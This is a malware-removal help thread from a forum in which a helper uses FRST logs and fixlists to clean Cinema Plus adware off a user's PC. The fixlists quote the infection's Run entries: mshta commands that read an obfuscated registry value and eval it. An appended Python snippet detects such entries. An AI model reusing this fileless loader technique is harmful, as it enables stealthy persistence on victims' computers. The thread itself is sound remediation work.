system
July 13, 2015, 1:57pm
1
Somehow a pesky Cinema Plus V07.07 found its way onto my computer, however when I try to uninstall it opens a window saying that I can uninstall and buy some other software, the “just uninstall” tiny text does nothing when I click on it. I’ve run Grime Fighter and Clean up which has helped a lot but does not remove this programme. I tried uninstalling in Safe Mode and it did nothing - any pointers on how to remove this pesky programme would be much appreciated!
Many thanks
Rebecca
Please download Farbar Recovery Scan Tool and save it to your Desktop.
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
- Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
- Select additions at the bottom
- Press Scan button.
https://dl.dropboxusercontent.com/u/73555776/frst.JPG
- It will produce a log called FRST.txt in the same directory the tool is run from.
- Please attach both logs generated.
system
July 13, 2015, 2:05pm
3
Ok thanks - file attached
Hi, this looks like something new, so when you have completed the fix could I have a fresh FRST scan, please?
CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKLM-x32\...\Run: [gmsd_gb_005010023] => [X]
HKLM-x32\...\Run: [**b5ece8a9<*>] => mshta javascript:Mml0EpM="a";w9N=new%20ActiveXObject("WScript.Shell");azsWhPH9c="GA";D2TB8V=w9N.RegRead("HKLM\\software\\Wow6432Node\\817f9077\\9364e27d");FVT2p8EbN="6SEkU";eval(D2TB8V);eVBVxi05w="189 (the data entry has 6 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [gmsd_gb_002030026] => [X]
HKU\S-1-5-18\...\Run: [**b5ece8a9<*>] => mshta javascript:UOTG80XHy="A";o8j=new%20ActiveXObject("WScript.Shell");BR3ISZB4="Wx2yMPvE";rbJM9=o8j.RegRead("HKCU\\software\\817f9077\\9364e27d");lv6ddkj="8IUKMkeA";eval(rbJM9);uEFdzI8="inNiyXLQr"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2193330594-1523224260-2583000878-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.trovi.com/?gd=&ctid=CT3334822&octid=EB_ORIGINAL_CTID&ISID=MAA83CF91-C36D-4AA5-9567-563EDBB3A255&SearchSource=55&CUI=&UM=8&UP=SP0B9A39A2-9137-4C56-B640-E8F9B396CBB9&D=071015&SSPV=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
SearchScopes: HKU\S-1-5-21-2193330594-1523224260-2583000878-1000 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.trovi.com/Results.aspx?gd=&ctid=CT3334822&octid=EB_ORIGINAL_CTID&ISID=MAA83CF91-C36D-4AA5-9567-563EDBB3A255&SearchSource=58&CUI=&UM=8&UP=SP0B9A39A2-9137-4C56-B640-E8F9B396CBB9&D=071015&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-2193330594-1523224260-2583000878-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 - No File
S4 zejytose; C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58\jnsh73EE.tmp [199168 2015-07-10] () [File not signed]
S4 nosepoze; C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58\knsc563B.tmpfs [X]
R1 {699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64; C:\Windows\System32\drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys [48784 2015-07-12] (StdLib)
S1 innfd_1_10_0_14; system32\drivers\innfd_1_10_0_14.sys [X]
2015-07-13 13:35 - 2015-07-13 13:35 - 00002476 _____ C:\Users\magicbrew\Desktop\Reimage2.lnk
2015-07-13 13:10 - 2015-07-12 22:00 - 00048784 _____ (StdLib) C:\Windows\system32\Drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys
2015-07-13 09:41 - 2015-07-13 09:52 - 00089365 _____ C:\ProgramData\L3553OBf.dat
2015-07-10 16:42 - 2015-07-13 13:02 - 00000000 ____D C:\Program Files (x86)\gmsd_gb_002030026
2015-07-10 16:42 - 2015-07-10 16:42 - 00003118 _____ C:\Windows\System32\Tasks\{6DCBDF0D-5DAA-460D-A57A-FC54E72EB4A8}
2015-07-10 10:26 - 2015-07-13 09:41 - 00000000 ____D C:\ProgramData\abc
2015-07-07 17:35 - 2015-07-13 12:35 - 00000000 ____D C:\Program Files (x86)\CinemaPlus-3.2cV07.07
2015-07-07 17:35 - 2015-07-13 09:44 - 00000004 _____ C:\Windows\SysWOW64\029B560A371F4E00AB32838EBC01B9E7
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Users\magicbrew\AppData\Local\globalUpdate
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Program Files (x86)\globalUpdate
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Program Files (x86)\c715af32-1dba-4665-97b0-d821aa5cac1c
2015-07-07 17:34 - 2015-07-13 12:34 - 00000000 ____D C:\Program Files (x86)\Coupoon
2015-07-07 17:34 - 2015-07-07 17:34 - 00000000 ____D C:\Users\magicbrew\AppData\Local\Crossbrowse
2015-07-07 17:33 - 2015-07-13 12:34 - 00000000 ____D C:\Users\magicbrew\AppData\Local\SmartWeb
2015-07-07 17:29 - 2015-07-07 17:29 - 00000000 ____D C:\Users\magicbrew\Documents\Any Video Converter
2015-07-07 17:28 - 2015-07-13 13:14 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\Anvsoft
2015-07-07 17:28 - 2015-07-13 13:14 - 00000000 ____D C:\Program Files (x86)\Anvsoft
2015-07-07 17:28 - 2015-07-07 17:28 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\OpenCandy
2015-07-07 17:20 - 2015-07-13 12:34 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58
2015-07-07 16:42 - 2015-07-07 16:42 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieUserList
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieSiteList
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieBrowserModeList
2014-12-02 12:21 - 2014-12-02 12:21 - 0000037 ___SH () C:\Users\magicbrew\AppData\Roaming\3491672254e498b9d1dc6f1.41918858
2015-07-13 09:41 - 2015-07-13 09:52 - 0089365 _____ () C:\ProgramData\L3553OBf.dat
Task: {15011F61-317C-4C6E-B9CC-BE3D69FC7EF6} - \0be795aa-89f8-4c7a-9398-1041b523595d-7 No Task File <==== ATTENTION
Task: {1BD5DD3B-034C-404D-A865-43F5A9A3D8A4} - System32\Tasks\{6DCBDF0D-5DAA-460D-A57A-FC54E72EB4A8} => pcalua.exe -a C:\PROGRA~2\SearchProtect\Main\bin\uninstall.exe -c /S <==== ATTENTION
Task: {1C675159-F615-4178-BDA2-661B02F80695} - \0be795aa-89f8-4c7a-9398-1041b523595d-10_user No Task File <==== ATTENTION
Task: {3698927B-EA05-4575-B552-EB753A7B98DF} - \0be795aa-89f8-4c7a-9398-1041b523595d-1-6 No Task File <==== ATTENTION
Task: {3D338D15-AA7D-44DD-9AA0-372968117ACD} - \0be795aa-89f8-4c7a-9398-1041b523595d-1-7 No Task File <==== ATTENTION
Task: {3DB89CD6-34E7-41C7-8229-546728E14DB5} - \CreateChoiceProcessTask No Task File <==== ATTENTION
Task: {42D26C8B-DD80-462E-98D8-DA6D742BC71E} - \0be795aa-89f8-4c7a-9398-1041b523595d-3 No Task File <==== ATTENTION
Task: {9F0B38CD-7EBC-4491-9456-2FC16171043E} - \0be795aa-89f8-4c7a-9398-1041b523595d-5 No Task File <==== ATTENTION
Task: {A02824C8-9D89-4F64-92EF-547A9C0616DC} - System32\Tasks\ProPCCleaner_Popup => C:\Program Files (x86)\Pro PC Cleaner\Splash.exe <==== ATTENTION
Task: {A6AF9D85-7F9A-476D-95F0-49FC3D51711D} - \0be795aa-89f8-4c7a-9398-1041b523595d-5_user No Task File <==== ATTENTION
Task: {E6C0A9FE-C0BF-4860-A45E-1701C67BC76B} - \PC SpeedUp Service Deactivator No Task File <==== ATTENTION
Task: {F0E841B2-7008-49CC-B4ED-BE8F5F76A920} - System32\Tasks\ProPCCleaner_Start => C:\Program Files (x86)\Pro PC Cleaner\ProPCCleaner.exe <==== ATTENTION
Task: {F1D93A0E-ED45-4FF7-8D26-42E20408A045} - \0be795aa-89f8-4c7a-9398-1041b523595d-6 No Task File <==== ATTENTION
Task: {FAC3FEDE-18BE-498C-B23D-0E6CD1ADF476} - \SmartWeb Upgrade Trigger Task No Task File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Microsoft:QcOdGCxHYBG4TkN7XblHwOl03ccj
AlternateDataStreams: C:\ProgramData\Microsoft:tXBgMqmC0uFWziwQrJ5GM6A7Ouis
AlternateDataStreams: C:\ProgramData\PACE:769ABF6D611ED68D
AlternateDataStreams: C:\Users\magicbrew\Cookies:gv1yIDMJyN4dl5RY
AlternateDataStreams: C:\Users\magicbrew\Cookies:L0LGLDSGlbNUjxSPWvA8KYn9jt
AlternateDataStreams: C:\Users\magicbrew\Local Settings:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\Local Settings:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\AppData\Local:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Application Data:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Application Data:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\hPkIakbtz61q:Zk0qrQeyENrPfsOIfIT1vtF
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temp:W7sJktx3CgzjNuxON43o9
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temporary Internet Files:gI0Cm4QLLW8Ky07opwOnfQ
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temporary Internet Files:z6zlAqiYS6ilphADGZa
C:\Windows\System32\drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated; please post that.
THEN
Please download AdwCleaner by Xplode onto your desktop.
- Close all open programs and internet browsers.
- Double click on AdwCleaner.exe to run the tool.
- Click on Scan.
- After the scan is complete click on “Clean”
- Confirm each time with Ok.
- Your computer will be rebooted automatically. A text file will open after the restart.
- Please post the content of that logfile with your next answer.
- You can find the logfile at C:\AdwCleaner[S0].txt as well.
system
July 14, 2015, 9:38am
6
I think that’s done the trick - the programme has gone! Thank you so much!!
OK, I would like to look at the registry keys referenced to ensure that they are safe for me to remove.
CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
Reg: reg query "HKCU\software\817f9077"
Reg: reg query "HKLM\software\Wow6432Node\817f9077"
Save this as fixlist.txt, in the same location as FRST.exe
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated; please post that.
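The Run entries flagged in the first fixlist start mshta with an inline javascript: URL that reads a registry value and passes it to eval, and the last post queries the keys those entries reference. The following is an added example (not part of the thread and not FRST's own code) that finds such entries in FRST-style log lines and derives the matching follow-up `reg query` commands; the sample lines are constructed with placeholder key and value names, and all function names are this example's own.

```python
import re
from urllib.parse import unquote

# FRST-style Run entry: <hive>\...\Run: [<value name>] => <data>
RUN_LINE = re.compile(r"^(?P<hive>.+?)\\\.\.\.\\Run: \[(?P<name>.*?)\] => (?P<data>.*)$")
SCRIPT_HOST = re.compile(r"\b(mshta|wscript|cscript|rundll32)(\.exe)?\b", re.I)
INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.I)
REGREAD = re.compile(r'RegRead\(\s*"([^"]+)"\s*\)', re.I)
EVAL_CALL = re.compile(r"\beval\s*\(", re.I)

def analyse_run_line(line):
    """Return a finding dict for a suspicious Run entry, else None."""
    m = RUN_LINE.match(line.strip())
    if not m:
        return None
    data = unquote(m.group("data"))  # the log shows %20 for spaces
    reasons = []
    if SCRIPT_HOST.search(data) and INLINE_SCRIPT.search(data):
        reasons.append("script host started with inline script")
    # The log shows JavaScript-escaped paths; collapse doubled backslashes.
    reads = [p.replace("\\\\", "\\") for p in REGREAD.findall(data)]
    if reads and EVAL_CALL.search(data):
        reasons.append("evaluates data read from the registry")
    if not reasons:
        return None
    return {"hive": m.group("hive"), "name": m.group("name"),
            "reasons": reasons, "reads": reads}

def scan(lines):
    return [f for f in map(analyse_run_line, lines) if f]

def followup_queries(findings):
    """reg query commands for the parent key of every RegRead target."""
    keys = []
    for f in findings:
        for path in f["reads"]:
            parent = path.rsplit("\\", 1)[0]  # drop the value name
            if parent not in keys:
                keys.append(parent)
    return ['reg query "%s"' % k for k in keys]

# Constructed sample lines; EXAMPLEKEY / EXAMPLEVAL are placeholders.
SAMPLE = [
    r'HKLM\...\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe',
    r'HKLM-x32\...\Run: [**example<*>] => mshta javascript:a=new%20ActiveXObject("WScript.Shell");b=a.RegRead("HKLM\\software\\Wow6432Node\\EXAMPLEKEY\\EXAMPLEVAL");eval(b); <===== ATTENTION',
    r'HKU\S-1-5-18\...\Run: [**example<*>] => mshta javascript:a=new%20ActiveXObject("WScript.Shell");b=a.RegRead("HKCU\\software\\EXAMPLEKEY\\EXAMPLEVAL");eval(b);',
]
```

The payload lives in the registry value that the Run entry reads, so removing only the Run entry leaves that data behind, which is why the referenced keys are inspected as a separate step.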